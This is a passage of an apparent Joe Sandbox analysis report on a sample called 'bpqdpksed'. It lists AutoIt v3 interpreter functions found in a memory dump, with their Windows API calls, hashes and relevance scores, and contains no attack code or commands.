                                                                                              • Instruction ID: 4c9d14735ac77490054030dbac57916cb52cb5aa4d3608d8fcce540fe128025a
                                                                                              • Opcode Fuzzy Hash: bccb2f148c05c21d3f179fae3446f65cce46f4ac1df4277f6b3822bb50690bf2
                                                                                              • Instruction Fuzzy Hash: BFC1EFB0A04349AFCF11EFADC855BADBBB4AF09300F18419DE954A73A2D7349942CB75
                                                                                              Function 00D62735 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 153comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D63236
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D6323E
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D63249
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D63254
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D6325C
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D63264
                                                                                                • Part of subcall function 00D6318C: RegisterWindowMessageW.USER32(00000004,?,00D62906), ref: 00D631E4
                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D629AC
                                                                                              • OleInitialize.OLE32 ref: 00D629CA
                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00DA39E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                              • String ID: (&$0$$@($$
                                                                                              • API String ID: 1986988660-84382417
                                                                                              • Opcode ID: 357ba898fa26282c4b383645b1e37d890a64b347c26627dd266829489f0ee509
                                                                                              • Instruction ID: 90babe576731720383223035d21e43a6ab444730d75c094195bd915c8913b8b7
                                                                                              • Opcode Fuzzy Hash: 357ba898fa26282c4b383645b1e37d890a64b347c26627dd266829489f0ee509
                                                                                              • Instruction Fuzzy Hash: E3718EB0901208AF8788DF7AAC6E6153EE1FB88304711912ED3D8E7361E7714649CF66
                                                                                              Function 00D6353A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D63568
                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D63589
                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D632EF,?), ref: 00D6359D
                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D632EF,?), ref: 00D635A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
                                                                                              • Opcode ID: d9fd18e6bf7be853ef8a28e691f917417b09bdbb3f646a86c5a8f428e5704977
                                                                                              • Instruction ID: b6e83ccd82dc99b0995334144074fbfa4a1b812c54562ef75bfdb85c878f7e0b
                                                                                              • Opcode Fuzzy Hash: d9fd18e6bf7be853ef8a28e691f917417b09bdbb3f646a86c5a8f428e5704977
                                                                                              • Instruction Fuzzy Hash: F7F03A7060029A7EE73117236C0CE3B3EBED7C6F10B11401EBB04AB260C2691859EAB0
                                                                                              Function 00DBE71E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32 ref: 00DBE72B
                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DBE73D
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00DBE763
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                                                              • API String ID: 145871493-2590602151
                                                                                              • Opcode ID: 6caac8e9ff85888b6db136db4bf98a78c08cf83c0eb0f742ba81b53d04ea8f2b
                                                                                              • Instruction ID: e435510172529114e25872cccdd55cef4e654395cf816d40ce4f73f5620b6f86
                                                                                              • Opcode Fuzzy Hash: 6caac8e9ff85888b6db136db4bf98a78c08cf83c0eb0f742ba81b53d04ea8f2b
                                                                                              • Instruction Fuzzy Hash: A5F03071806721DBD7725F108C49AE977256F10B44B188959E947E7250EB34C944C6B5
                                                                                              Function 00D655F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D655EB,SwapMouseButtons,00000004,?), ref: 00D6561C
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D655EB,SwapMouseButtons,00000004,?), ref: 00D6563D
                                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D655EB,SwapMouseButtons,00000004,?), ref: 00D6565F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Control Panel\Mouse
                                                                                              • API String ID: 3677997916-824357125
                                                                                              • Opcode ID: fc54b4ac4a1b47a28e75dc077de4443ca3706ea3232826d41cd3966e42b0f273
                                                                                              • Instruction ID: 512cbb317022d97038087f6832d0a0224b90a4c03334e581d370306ab679c223
                                                                                              • Opcode Fuzzy Hash: fc54b4ac4a1b47a28e75dc077de4443ca3706ea3232826d41cd3966e42b0f273
                                                                                              • Instruction Fuzzy Hash: 0D117C71610608BFDB208FA4DC40DAF77B9EF00744F548469F806D7224D6719E80D770
                                                                                              Function 00DCDA81 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00DFDC30), ref: 00DCDABB
                                                                                              • GetLastError.KERNEL32 ref: 00DCDACA
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00DCDAD9
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DFDC30), ref: 00DCDB36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 2267087916-0
                                                                                              • Opcode ID: 2593ad35b89b37e6898adef73cec84c65bb32aa18679da54cc6374a79b4e958c
                                                                                              • Instruction ID: 394f5c05e5f178666325eaf5b12c5347d81479c149bb0d24b3530663ad0ccdb2
                                                                                              • Opcode Fuzzy Hash: 2593ad35b89b37e6898adef73cec84c65bb32aa18679da54cc6374a79b4e958c
                                                                                              • Instruction Fuzzy Hash: A92130705093069F8710DF24CC8196AB7E6EE69364F154A2EF499C72A1E730DD49CBB2
                                                                                              Function 00D63A1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00DA4115
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                                • Part of subcall function 00D639DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D639FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name$Path$FileFullLongOpen
                                                                                              • String ID: X$`u
                                                                                              • API String ID: 779396738-2693526198
                                                                                              • Opcode ID: 94ba4559de5fe8b2202a565a0fac586b247a38def56a1a579501e1c7552c5a59
                                                                                              • Instruction ID: 122aa5454880039ea8aad92a362ccffd811032968487e8d725ac9bea990499f8
                                                                                              • Opcode Fuzzy Hash: 94ba4559de5fe8b2202a565a0fac586b247a38def56a1a579501e1c7552c5a59
                                                                                              • Instruction Fuzzy Hash: 33219371A042589BCB01DF98D846BEE7BF99F89704F004019E545F7241DBF49A898FB1
                                                                                              Function 00D8016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00D809F8
                                                                                                • Part of subcall function 00D83634: RaiseException.KERNEL32(?,?,?,00D80A1A,?,00000000,?,?,?,?,?,?,00D80A1A,00000000,00E29758,00000000), ref: 00D83694
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00D80A15
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                              • String ID: Unknown exception
                                                                                              • API String ID: 3476068407-410509341
                                                                                              • Opcode ID: ce8ae6356c094e535b0577a9c143a132daf8fb4206ce70b6a3c3c0aeb1a44e86
                                                                                              • Instruction ID: 7202739fa257ca84d5dd8cda522a50c8e7249fae46fd6539687e464aaac512a4
                                                                                              • Opcode Fuzzy Hash: ce8ae6356c094e535b0577a9c143a132daf8fb4206ce70b6a3c3c0aeb1a44e86
                                                                                              • Instruction Fuzzy Hash: 21F0683450030DB7CB44BA69E84699D7F6C9E00760B544161F914D54E3FB70DA5ECBF0
                                                                                              Function 00DBE59A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: %.3d$X64
                                                                                              • API String ID: 481472006-1077770165
                                                                                              • Opcode ID: 2d8a0c6e63626ec94331f0c714a306d6830d3888f42ec6bef45397ccfa2170b0
                                                                                              • Instruction ID: 08beb8cc909dadd18ae4adc7ed91b6c35471a3a873f5b7e03220fe1bbba49786
                                                                                              • Opcode Fuzzy Hash: 2d8a0c6e63626ec94331f0c714a306d6830d3888f42ec6bef45397ccfa2170b0
                                                                                              • Instruction Fuzzy Hash: 97D012B1C04118D5CBA09B90D9498FDB3BCB71C304F108852F447E2000FA34D508A771
                                                                                              Function 00DE88B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DE8C52
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00DE8C59
                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00DE8E3A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 146820519-0
                                                                                              • Opcode ID: 065e97e0aae43254ced8e6b67b2856521a857e8fa8ed7ffd1a10dd05e1ed9c8d
                                                                                              • Instruction ID: 2d70494aa14b2b6aec0f37a06b693abc6ff48b93ebbdf4e9509271023dcffea4
                                                                                              • Opcode Fuzzy Hash: 065e97e0aae43254ced8e6b67b2856521a857e8fa8ed7ffd1a10dd05e1ed9c8d
                                                                                              • Instruction Fuzzy Hash: 06124B71A043419FC714DF29C484B2ABBE5FF85314F18895DE8898B392DB71E945CFA2
                                                                                              Function 00D66BFA Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00D66CA1
                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00D66CB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: f713372231ee210190fc390ecd2745c6acdb21f611d248d238dd9b8bfda43745
                                                                                              • Instruction ID: 4a1534beac89218e88e858e7aa46746759e826603f4f2e0a5e2030c32717f9e9
                                                                                              • Opcode Fuzzy Hash: f713372231ee210190fc390ecd2745c6acdb21f611d248d238dd9b8bfda43745
                                                                                              • Instruction Fuzzy Hash: C0316C71A00A09FFDB14CF69C980BA9BBB5FB44314F198629E95597340C771FE94CBA0
                                                                                              Function 00D7FCBB Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D65F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D66049
                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00D7FD44
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D7FD53
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DBFDD3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_Timer$Kill
                                                                                              • String ID:
                                                                                              • API String ID: 3500052701-0
                                                                                              • Opcode ID: 05bcb1c9225d156f13f813d62a853f728d0803b59d17238c90dbbcaa362e53d6
                                                                                              • Instruction ID: 6cc94be0a6de72cb673570f1c45361bd22dc5477137cf6a9c2203880ef2969d1
                                                                                              • Opcode Fuzzy Hash: 05bcb1c9225d156f13f813d62a853f728d0803b59d17238c90dbbcaa362e53d6
                                                                                              • Instruction Fuzzy Hash: 1731B171904344AFEB328F248C85BE6BBEDAB06308F0444AEE6DE97241D7745A85CB61
                                                                                              Function 00D98A3E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(00000000,00000000,?,?,00D9895C,?,00E29CE8,0000000C), ref: 00D98A94
                                                                                              • GetLastError.KERNEL32(?,00D9895C,?,00E29CE8,0000000C), ref: 00D98A9E
                                                                                              • __dosmaperr.LIBCMT ref: 00D98AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 2583163307-0
                                                                                              • Opcode ID: 8ccd5d201f60264de28630e48d0a21b2fb225256f4e732a0159c3b3f617ce7e8
                                                                                              • Instruction ID: d9f45b7730661d0414cfb4c479c5e76e82b941ab2bdb4a8f9955ab6bb7f4bb26
                                                                                              • Opcode Fuzzy Hash: 8ccd5d201f60264de28630e48d0a21b2fb225256f4e732a0159c3b3f617ce7e8
                                                                                              • Instruction Fuzzy Hash: DE012F326095505ADF1563B46885B7E67468B83F34F2D025EF915DB1D2DE60CC86A3B0
                                                                                              Function 00D9971B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00D997CA,FF8BC369,00000000,00000002,00000000), ref: 00D99754
                                                                                              • GetLastError.KERNEL32(?,00D997CA,FF8BC369,00000000,00000002,00000000,?,00D95EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00D86F61), ref: 00D9975E
                                                                                              • __dosmaperr.LIBCMT ref: 00D99765
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 2336955059-0
                                                                                              • Opcode ID: 23993eb68358ebd7d943796e5e5d6995f6b0716537e46029f7ee754ba23fd88d
                                                                                              • Instruction ID: e398c19fd57b0b3ec7f166d90d002a86ec6c45edfcdf18bcf1958a6860a359ce
                                                                                              • Opcode Fuzzy Hash: 23993eb68358ebd7d943796e5e5d6995f6b0716537e46029f7ee754ba23fd88d
                                                                                              • Instruction Fuzzy Hash: 2701D832620615ABCF059FE9DC55C6E7B2BDB85320B28025DF815DB291EA71DD41C7B0
                                                                                              Function 00D6F1E8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • TranslateMessage.USER32(?), ref: 00D6F22B
                                                                                              • DispatchMessageW.USER32(?), ref: 00D6F239
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D6F24F
                                                                                              • Sleep.KERNELBASE(0000000A), ref: 00D6F261
                                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00DB327C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                              • String ID:
                                                                                              • API String ID: 3288985973-0
                                                                                              • Opcode ID: d44ebedb49e421b6fbeaa6e595a20eba19a789d07ea81812a0b5c3319c8b91ba
                                                                                              • Instruction ID: 2275ec27bb419b2c15c34d17fff81a452d55a200f6909a47d2c56a6a2bf166d9
                                                                                              • Opcode Fuzzy Hash: d44ebedb49e421b6fbeaa6e595a20eba19a789d07ea81812a0b5c3319c8b91ba
                                                                                              • Instruction Fuzzy Hash: 81F08231504341DBEB349B60DC49FEA73AEEB85300F004929F65AD71D0DB309548CB35
                                                                                              Function 00D72AD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 00D72FB6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
